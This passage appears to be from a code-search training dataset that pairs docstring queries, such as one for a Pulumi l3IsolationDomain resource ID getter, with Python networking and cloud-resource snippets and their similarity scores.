item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n has_invalid_cidr = False\n\n if sys.version_info[0] < 3:\n if type(item['CidrIp']) == type(unicode()):\n\n if debug:\n print('ip is: ' + str(item['CidrIp']) + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in item['CidrIp']:\n has_invalid_cidr = True\n\n elif item['CidrIp'].endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n has_invalid_cidr = False\n\n return has_invalid_cidr\n\n else:\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress.cidrIpv6:\n return True\n\n elif ingress.cidrIpv6.endswith(suffix):\n if debug:\n print('ip ends with /128' + lineno())\n return True\n\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n elif type(ingress) == type(str()):\n if debug:\n print('is a str ' + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress:\n return True\n\n elif ingress.endswith('/128'):\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n elif sys.version_info[0] < 3 and type(ingress) == type(unicode()):\n if debug:\n print('is a str ' + lineno())\n\n # only care about literals. if a Hash/Ref not going to chase it down\n # given likely a Parameter with external val\n if 'Ref' in ingress:\n return True\n\n elif ingress.endswith('/128'):\n return True\n else:\n if debug:\n print('ip does not end with /128' + lineno())\n return False\n\n return False",
"def get_mask_ipv6(bits):\n\n if bits > 128 or bits < 0:\n raise ValueError('A mask can only be 0-128 bits, got %i' % bits)\n elif bits == 128:\n return FULL_IPv6_MASK\n\n # get the binary representation of the mask\n mask_bin = _get_binary(2 ** bits - 1, 128)[::-1]\n\n # breaks it into sixteen character groupings\n groupings = [mask_bin[16 * i:16 * (i + 1)] for i in range(8)]\n\n # converts each group into its hex value\n return ':'.join(['%04x' % int(group, 2) for group in groupings]).upper()",
"def cidr(self):\n return self._cidr",
"def NoOfAddressPrefix(self):\n return self._get_attribute('noOfAddressPrefix')",
"def find_ipv6():\n\n test_host = '2600::' # Sprint.net\n try:\n with socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) as s:\n s.connect((test_host, 53))\n ipv6 = s.getsockname()[0]\n except:\n if cfg['debug']:\n print(\"Couldn't create a socket to %s\" % test_host)\n print(\"Check that you have a valid IPv6 default route\")\n ipv6 = None\n\n return ipv6",
"def network(self):\n address = unicode(\"%s/%s\" % (self.address, _get_cidr(self.netmask)))\n return IPv4Network(address, strict=False)",
"def allocation_min_netmask_length(self) -> pulumi.Output[Optional[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def get_ipv6_host(self, host):\n\n try:\n host = u'{0}'.format(host)\n return IPv6Network(host, strict=False)\n except ValueError as e:\n error_msg = \"Given host {0} is an invalid IPv6 format -- \" \\\n \"error {1}\".format(host, str(e))\n LOG.error(error_msg)\n self.module.fail_json(msg=error_msg)",
"def ipv6_native(self) -> bool:\n return pulumi.get(self, \"ipv6_native\")",
"def remote_ip_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ip_prefix\")",
"def remote_ip_prefix(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"remote_ip_prefix\")",
"def update_gateway_with_prefixlen(self, ipv4='', ipv4_prefixlen=0, \n ipv6='', ipv6_prefixlen=0, port_no=''):\n port = self.ports[port_no]\n\n if port.gateway is None:\n port.gateway = Gateway(name=port.name, port_no=port.port_no,\n ipv4=ipv4, ipv4_prefixlen=ipv4_prefixlen,\n ipv6=ipv6, ipv6_prefixlen=ipv6_prefixlen)\n else:\n port.gateway.name = port.name\n port.gateway.ipv4 = netaddr.IPAddress(ipv4)\n port.gateway.ipv4_subnet = netaddr.IPNetwork(ipv4 + '/' + str(ipv4_prefixlen))\n port.gateway.ipv6 = netaddr.IPAddress(ipv6)\n port.gateway.ipv6_subnet = netaddr.IPNetwork(ipv6 + '/' + str(ipv6_prefixlen))\n port.gateway.port_no = port.port_no\n\n self.tbl.update_entry(subnet=port.gateway.ipv4_subnet, receive_port=port, metric=0, source=\"CONNECTED\")",
"def alias(self):\n return 'IPv6-Opts'",
"def get_if_addr6(iff):\n return next((x[0] for x in in6_getifaddr()\n if x[2] == iff and x[1] == IPV6_ADDR_GLOBAL), None)",
"def ipv6_access_type(self) -> Optional[pulumi.Input['IPAllocationPolicyIpv6AccessType']]:\n return pulumi.get(self, \"ipv6_access_type\")",
"def allocation_min_netmask_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def allocation_min_netmask_length(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"allocation_min_netmask_length\")",
"def is_ipv6(cluster_config):\n cluster = load_cluster_config_json(cluster_config)\n return cluster[\"environment\"][\"ipv6_enabled\"]",
"def network(ip):\n ip, prefix = netParse(ip)\n return \"{}/{}\".format(\n ipStr(ip & (0xffffffff << (32 - prefix))),\n prefix\n )",
"def subnetting(self):\n ip = netaddr.IPNetwork(addr=self.subnet)\n subnets = list(ip.subnet(prefixlen=24))\n list_subnets = [str(subnet) for subnet in subnets]\n return list_subnets",
"def cidr(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"cidr\")"
] | [
"0.7729275",
"0.76980174",
"0.76423615",
"0.76423615",
"0.74332094",
"0.6983688",
"0.6952086",
"0.69470865",
"0.6910834",
"0.6910834",
"0.6771784",
"0.65345484",
"0.6393636",
"0.6392489",
"0.634702",
"0.6326751",
"0.6292675",
"0.6250887",
"0.62504554",
"0.6245007",
"0.6242389",
"0.62111634",
"0.61639744",
"0.6129926",
"0.61279005",
"0.6124118",
"0.6123404",
"0.6011149",
"0.6000404",
"0.59922934",
"0.5961852",
"0.59380776",
"0.59224266",
"0.5904247",
"0.58965254",
"0.5884845",
"0.5841586",
"0.5811044",
"0.57858795",
"0.57753503",
"0.57629985",
"0.57561666",
"0.5749286",
"0.57438874",
"0.572851",
"0.5718094",
"0.57133394",
"0.57131594",
"0.570418",
"0.5700854",
"0.5697253",
"0.5693369",
"0.56607217",
"0.56362534",
"0.5634834",
"0.5634834",
"0.56252795",
"0.5624694",
"0.5611572",
"0.5611493",
"0.5585948",
"0.55839694",
"0.55762595",
"0.557162",
"0.55490845",
"0.55462766",
"0.5541481",
"0.55411285",
"0.5517764",
"0.55050266",
"0.5475352",
"0.54672366",
"0.54544413",
"0.5450409",
"0.54385674",
"0.54139763",
"0.54112065",
"0.53973544",
"0.5391061",
"0.5383078",
"0.5383049",
"0.5382081",
"0.5379691",
"0.53760344",
"0.5375599",
"0.5375143",
"0.53591913",
"0.53409517",
"0.5304832",
"0.5304832",
"0.5301838",
"0.5299387",
"0.52880913",
"0.52783364",
"0.52632976",
"0.52632976",
"0.5260236",
"0.5252007",
"0.5245292",
"0.52389383"
] | 0.7312516 | 5 |
The resource ID of the Network Fabric l3IsolationDomain. | def l3_isolation_domain_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "l3_isolation_domain_id") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def l3_isolation_domain_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"l3_isolation_domain_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> str:\n return pulumi.get(self, \"resource_id\")",
"def external_network_id(self) -> str:\n return pulumi.get(self, \"external_network_id\")",
"def id(self):\n return self._domain.id",
"def domain_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"domain_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> str:\n return pulumi.get(self, \"resource_group_id\")",
"def dns_zone_resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"dns_zone_resource_id\")",
"def domain_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain_id\")",
"def domain_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"domain_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_pool_id(self) -> str:\n return pulumi.get(self, \"resource_pool_id\")",
"def failover_group_id(self) -> str:\n return pulumi.get(self, \"failover_group_id\")",
"def resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_id\")",
"def custom_compliance_domain_id(self):\n return self._custom_compliance_domain_id",
"def unique_id(self):\n return self._light.address",
"def get_keystone_v3_domain_id(self, domain_name):\n LOG_OBJ.debug(\"Get the domain ID.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/domains?name=\" + \\\n str(domain_name)\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n _body = None\n\n response = self.request(\"GET\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while getting the \"\n \"ID of domain\")\n print (\"No response from Server while getting the \"\n \"ID of domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Get domain ID Failed with status %s and error \"\n \": %s\" % (response.status, response.data))\n print (\"Get domain ID Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Domain details : %s \" % output)\n if len(output['domains']) != 1:\n LOG_OBJ.debug(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n print(\"No. of domains with name %s is %s\"\n % (domain_name, len(output['domains'])))\n return\n\n return output['domains'][0]['id']",
"def resource_group_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"resource_id\")",
"def vulnerability_resilience_id():\n\n if S3VulnerabilityModel.resilience_pid is None:\n # Get the parameter_id of the aggregated_indicator\n db = current.db\n table = db.vulnerability_aggregated_indicator\n row = db(table.uuid == \"Resilience\").select(table.parameter_id,\n limitby=(0, 1)).first()\n try:\n S3VulnerabilityModel.resilience_pid = row.parameter_id\n except:\n # DB not initialised\n pass\n\n return S3VulnerabilityModel.resilience_pid",
"def external_id(self) -> str:\n return self._search_in_properties(ATTR_GUID)",
"def managed_rule_identifier(self) -> str:\n return pulumi.get(self, \"managed_rule_identifier\")",
"def managed_rule_identifier(self) -> str:\n return pulumi.get(self, \"managed_rule_identifier\")",
"def resource_group_id(self) -> Optional[str]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_id\")",
"def external_id(self):\n return self._external_id",
"def external_id(self):\n return self._external_id",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def data_center_id(self) -> str:\n return pulumi.get(self, \"data_center_id\")",
"def unique_id(self):\n return self.config_entry.entry_id + \"lsa\"",
"def hydrofabric_data_id(self) -> str:\n return self._hydrofabric_data_id",
"def unique_identifier(self) -> str:\n return pulumi.get(self, \"unique_identifier\")",
"def unique_id(self):\n return f\"c{self._zone.controller_index + 1}_z{self._zone.zone_index + 1}\"",
"def unique_id(self):\n return f\"bhyve:program:{self._program_id}\"",
"def internal_id(self) -> str:\n return pulumi.get(self, \"internal_id\")",
"def security_group_id_for_domain_boundary(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"security_group_id_for_domain_boundary\")",
"def storage_account_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"storage_account_resource_id\")",
"def id(self):\n return self.raw_resource.uuid",
"def establish_id(self):\n if self.config.node_id is None:\n self.config.node_id = str(uuid4()).replace('-', '')\n return self.config.node_id",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def dataset_id(self) -> str:\n return pulumi.get(self, \"dataset_id\")",
"def unique_id(self):\n return self.config_entry.entry_id + \"nls\"",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def cluster_id(self) -> str:\n return pulumi.get(self, \"cluster_id\")",
"def network_fabric_controller_id(self) -> str:\n return pulumi.get(self, \"network_fabric_controller_id\")",
"def resourceid(self):",
"def sql_virtual_machine_group_resource_id(self) -> Optional[str]:\n return pulumi.get(self, \"sql_virtual_machine_group_resource_id\")",
"def parent_cluster_resource_id(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"parent_cluster_resource_id\")",
"def storage_resource_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"storage_resource_id\")",
"def getMcc3Id(self):\n return self._base.getMcc3Id()",
"def id(self): \n if self.cloudnet:\n return self.cloudnet.id\n else:\n return None",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def resource_group_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_group_id\")",
"def namespace_id(self) -> str:\n return pulumi.get(self, \"namespace_id\")",
"def database_id(self) -> str:\n return pulumi.get(self, \"database_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def config_rule_id(self) -> str:\n return pulumi.get(self, \"config_rule_id\")",
"def slb_id(self) -> str:\n return pulumi.get(self, \"slb_id\")",
"def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")",
"def target_resource_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"target_resource_id\")",
"def cal_guid(self):\n return 'setup' + str(self.id) + '@lnldb'",
"def id(self) -> str:\n\n return self._inst.query('*IDN?')",
"def unique_id(self) -> str:\n return pulumi.get(self, \"unique_id\")",
"def get_id(self):\n if not self.nccl_id:\n logger.warning(\"The NCCL ID has not been \"\n \"set yet for store {}.\".format(self.name))\n return self.nccl_id"
] | [
"0.8125011",
"0.639748",
"0.639748",
"0.639748",
"0.6284943",
"0.6265004",
"0.62123185",
"0.617114",
"0.617114",
"0.617114",
"0.617114",
"0.617114",
"0.6158674",
"0.60937095",
"0.60937095",
"0.6091811",
"0.6091811",
"0.6091811",
"0.60563904",
"0.60457486",
"0.5990473",
"0.5979375",
"0.59711367",
"0.5962884",
"0.5938235",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.59169245",
"0.5891642",
"0.58725715",
"0.5865841",
"0.5865841",
"0.58452266",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.5840752",
"0.57935536",
"0.57935536",
"0.5793322",
"0.5793322",
"0.5785437",
"0.5774641",
"0.5774483",
"0.57647943",
"0.5748912",
"0.57442796",
"0.5741626",
"0.5724627",
"0.5717584",
"0.5717369",
"0.5704724",
"0.5704724",
"0.5704724",
"0.57012415",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56968486",
"0.56872606",
"0.56858325",
"0.5676404",
"0.5668158",
"0.5667462",
"0.5666045",
"0.56643575",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.5661761",
"0.56503826",
"0.56264055",
"0.5621662",
"0.5621662",
"0.5621662",
"0.5621662",
"0.5621106",
"0.5614265",
"0.5614265",
"0.56135184",
"0.56134295",
"0.5609916",
"0.56079584"
] | 0.82438326 | 0 |
The geolocation where the resource lives | def location(self) -> pulumi.Output[str]:
return pulumi.get(self, "location") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_location(self):\n\t\treturn self.location",
"def get_location(self):\n return self.location",
"def get_location(self):\n return self.location",
"def get_location(self):\r\n return self.__location",
"def get_location(self):\r\n return None",
"def getLocation(self):\n return self._Location",
"def geolocation(self):\n return self.get_property('geolocation', GeolocationColumn())",
"def location(self):\n return self.geometry.location",
"def location(self):\n self.manager.refresh_client()\n return self.content[\"location\"]",
"def location(self):\n return self._location",
"def location(self):\n return self._location",
"def get_current_locate(self) -> dict:\r\n geolocate: dict = self.gmaps.geolocate()\r\n return geolocate",
"def geolocation(self):\n if self.latitude and self.longitude:\n return self.longitude, self.latitude",
"def Lokation(self):\n return self.getMylocation()",
"def location(self):\r\n return self._get('location', {})",
"def get_location(self) -> tuple:\n return self.__location",
"def location(self) -> object:\n return self._location",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def location(self) -> str:\n return pulumi.get(self, \"location\")",
"def getLocation(self):\n send_url = 'https://ipinfo.io'\n r = requests.get(send_url)\n resp = json.loads(r.text)\n logging.info(\"GeoLoc: {}\".format(resp))\n return resp",
"def location(self):\n return self.properties.get(\"location\", Location())",
"def geo(self):\n return self.query.geo",
"def location(self) -> Object:\n return self._location",
"def locate(self):\n if self.location == '':\n return None\n if self.coords is not None:\n return self.coords\n\n loc = urlencode({'address': self.location})\n urldoc = urlopen(User._GMAP_URL.format(query=loc))\n jsObj = json.loads(urldoc.readall().decode('utf-8'))\n if len(jsObj['results']) > 0:\n # discard commercial results\n locTypes = jsObj['results'][0]['address_components'][0]['types']\n if not 'premise' in locTypes and not 'route' in locTypes and not 'establishment' in locTypes and not 'subpremise' in locTypes:\n self.coords = jsObj['results'][0]['geometry']['location']\n return self.coords\n # still here? it's all rubbish\n return None",
"def get_location(self):\n return self.request({\n \"path\": \"/\" + UUID + \"/location\"\n })",
"def m_location_get(self) -> Point:\n pass",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def location(self) -> str:\n return self.__location",
"def get_current_location(self):\n return self.enu_2_local()",
"def location(self) -> str:\n return self._location",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def location(self) -> Optional[str]:\n return pulumi.get(self, \"location\")",
"def get_location(self) -> models.Location:\n return models.Location.get(region=self, name=self.name, deleted=False)",
"def get_location(self) -> Union[str, None]:\n return self._get_location()",
"def location(self) -> str:\n return self.metadata.location",
"def get_location(self):\r\n response = self.connection.make_request('GET', self.name,\r\n query_args='location')\r\n body = response.read()\r\n if response.status == 200:\r\n rs = ResultSet(self)\r\n h = handler.XmlHandler(rs, self)\r\n xml.sax.parseString(body, h)\r\n return rs.LocationConstraint\r\n else:\r\n raise self.connection.provider.storage_response_error(\r\n response.status, response.reason, body)",
"def location(self):\n if \"location\" in self._prop_dict:\n if isinstance(self._prop_dict[\"location\"], OneDriveObjectBase):\n return self._prop_dict[\"location\"]\n else :\n self._prop_dict[\"location\"] = Location(self._prop_dict[\"location\"])\n return self._prop_dict[\"location\"]\n\n return None",
"def get_relative_location(self):\n http = urllib3.PoolManager()\n url = 'http://ipinfo.io/json'\n response = http.request('GET', url)\n soup = BeautifulSoup(response.data, features=\"html5lib\")\n soup = str(soup).split(\"body\")[1][1:-2]\n try:\n soup = ast.literal_eval(soup)\n self.ip_addr = soup['ip']\n self.location = soup['loc']\n except Exception as e:\n print(\"Approximate address can not be determined...\")\n self.ip_addr = None\n self.location = None",
"def cal_location(self):\n return self.location.name",
"async def location(self):\n if not hasattr(self, \"_location\"):\n self._location = await Stack.fetch_stack_value(self, \"http://usefulinc.com/ns/doap#location\", await self.uuid)\n return self._location",
"def location(self):\r\n try:\r\n return self.data['location']\r\n except KeyError:\r\n return self.data['station_name']",
"def get_location(self):\n return self._overridden_location or self.get_default_location()",
"def get_location(self, ip_address):\n location = None\n url = \"http://dazzlepod.com/ip/{0}.json\".format(ip_address)\n status_code, json_data = self.urlopen(url)\n if status_code == 200 and json_data:\n tmp_location = json.loads(json_data)\n if 'latitude' in tmp_location and 'longitude' in tmp_location:\n location = tmp_location\n return location",
"def get_location(self):\n # h = b'\\r\\nAT-MSGEO\\r\\r\\n-MSGEO: -3936,3464,-3612,7402d50c\\r\\n\\r\\n'\n # an example of the string returned from the AT-MSGEO used for testing.\n h = self.acquire_response(b'AT-MSGEO')\n if isinstance(h, bytes):\n h = h.decode('utf-8')\n h = h.strip()\n h = h.split(':')\n h = h[1].split(',')\n x = int(h[0])*1000 # Convert coordinates to meters.\n y = int(h[1])*1000\n z = int(h[2])*1000\n else:\n print('Location not available')\n\n # 'geocent' refers to the geo-centered frame that the co-ordinates are returned in\n inProj = Proj(proj='geocent', ellps='WGS84', datum='WGS84')\n\n # 'latlong' is the frame to be converted to\n outProj = Proj(proj='latlong', ellps='WGS84', datum='WGS84')\n\n # Convert X, Y, Z to latitude, longitude and altitude\n long, lat, alt = transform(inProj, outProj, x, y, z, radians=False)\n # l = [str(long), str(lat), str(alt)]\n return long, lat, alt",
"def get_current_location(self):\n return self._current_loc",
"def founding_location(self) -> object:\n return self._founding_location",
"def _get_location(self):\n return industry.Location(itemID=self.locationID, flagID=self.locationFlagID, ownerID=self.ownerID, typeID=self.locationTypeID)",
"def get_geolocation(self, location):\n\n response = self.request(dict(\n method=\"GET\",\n query=dict(location=location),\n ))\n\n return response['data']",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def location(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"location\")",
"def user_place(self):\n place = self.status.user['location']\n return place",
"def location_a(self):\n return self._location_a",
"def location_info(self) -> LocationInfoIm:\n return self._location_info",
"def location(self) -> Optional[str]:\n raise NotImplementedError()",
"def _get_current_location(self):\n return self.get_queryset().filter(status=self.model.CURRENT).first()",
"def location(self) -> str:\n\t\tind = self._raw_result['locationIndex']\n\t\tif ind > -1 and ind < len(self._client.locations):\n\t\t\treturn self._client.locations[ind]['name']\n\t\treturn \"\"",
"def location_hint(self) -> str:\n return pulumi.get(self, \"location_hint\")",
"def location(self):\n return self.element.location",
"def Loc(self):\n return self.Localize",
"def returncarlocation(self):\n retrieved_location = self.update_car_location()\n if retrieved_location:\n self.currentcar_location[\"Longitude\"] = retrieved_location[\"Longitude\"]\n self.currentcar_location[\"Latitude\"] = retrieved_location[\"Latitude\"]\n self.currentcar_location[\"Time\"] = datetime.now()\n return self.currentcar_location",
"def location(self) -> CameraLocationType:\n return self._location",
"def location(self):\n return [self.lat, self.lon]",
"def get_player_location(self):\n return self.player.location",
"def location(self):\n if self.scoping:\n return self.scoping.location\n else:\n return None",
"def location(self, time: int) -> Location:\n self.refreshDroneStatus(time)\n return self.__location",
"def cal_location(self):\n return self.setup_location.name",
"def get_pokemon_location(self):\n return self._pokemon_location",
"def locations(self):\r\n return resource.Location(self)"
] | [
"0.816298",
"0.7999453",
"0.79540074",
"0.7945644",
"0.78364915",
"0.77626437",
"0.7730134",
"0.7681095",
"0.7624169",
"0.76093256",
"0.76093256",
"0.75724584",
"0.75544393",
"0.7547195",
"0.75165695",
"0.74507827",
"0.74267685",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7419033",
"0.7406362",
"0.7359666",
"0.73106575",
"0.7298844",
"0.72935575",
"0.72554076",
"0.7220563",
"0.72126144",
"0.72126144",
"0.72126144",
"0.718496",
"0.7151951",
"0.710894",
"0.710894",
"0.710894",
"0.7102068",
"0.7084974",
"0.70708954",
"0.7024406",
"0.70236313",
"0.7014063",
"0.69928896",
"0.69530916",
"0.69379604",
"0.6935117",
"0.69253886",
"0.6905298",
"0.690296",
"0.6884053",
"0.68591607",
"0.6844422",
"0.68391085",
"0.68391085",
"0.68391085",
"0.68391085",
"0.6816552",
"0.67645866",
"0.6751419",
"0.67463267",
"0.67445743",
"0.6738971",
"0.67155385",
"0.67094636",
"0.6681957",
"0.66757774",
"0.66720206",
"0.666216",
"0.66248953",
"0.6623208",
"0.6617238",
"0.66021705",
"0.66020995",
"0.65998936"
] | 0.6883943 | 75 |
The name of the resource | def name(self) -> pulumi.Output[str]:
return pulumi.get(self, "name") | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_resource_name(self):\n return self._resource_name",
"def name(self):\n return self.raw_resource[\"name\"]",
"def resource_name(self) -> Optional[str]:\n return pulumi.get(self, \"resource_name\")",
"def resource_name(self) -> Optional[str]:\n return pulumi.get(self, \"resource_name\")",
"def name(self):\n\n return self.resource[\"metadata\"][\"name\"]",
"def resource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_name\")",
"def resource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_name\")",
"def resource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_name\")",
"def resource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_name\")",
"def resource_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_name\")",
"def __str__(self):\n return self.resource.__name__",
"def get_objectName(self):\n return self.resource.get_name()",
"def resource_prefix(self):",
"def ResourcePath(self, name):\n pass",
"def subresource_name(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"subresource_name\")",
"def name(self) -> str:\n pass",
"def name(self) -> str:\n pass",
"def name(self) -> str:\n pass",
"def name(self) -> str:\n pass",
"def name(self) -> str:\n ...",
"def name(self) -> str:\n ...",
"def resource(self):\n return str(self._resource)",
"def getName():",
"def getName():",
"def getName():",
"def getName():",
"def getName():",
"def getName():",
"def name(self):\n\t\treturn self.asset.name",
"def get_resource_name(self, name):\n return super(KeyVaultTestCase, self).get_resource_name(\"livekvtest{}\".format(name))",
"def name(self) -> str:",
"def name(self) -> str:",
"def name(self) -> str:",
"def name(self) -> str:",
"def name(self) -> str:",
"def name(self):\n pass",
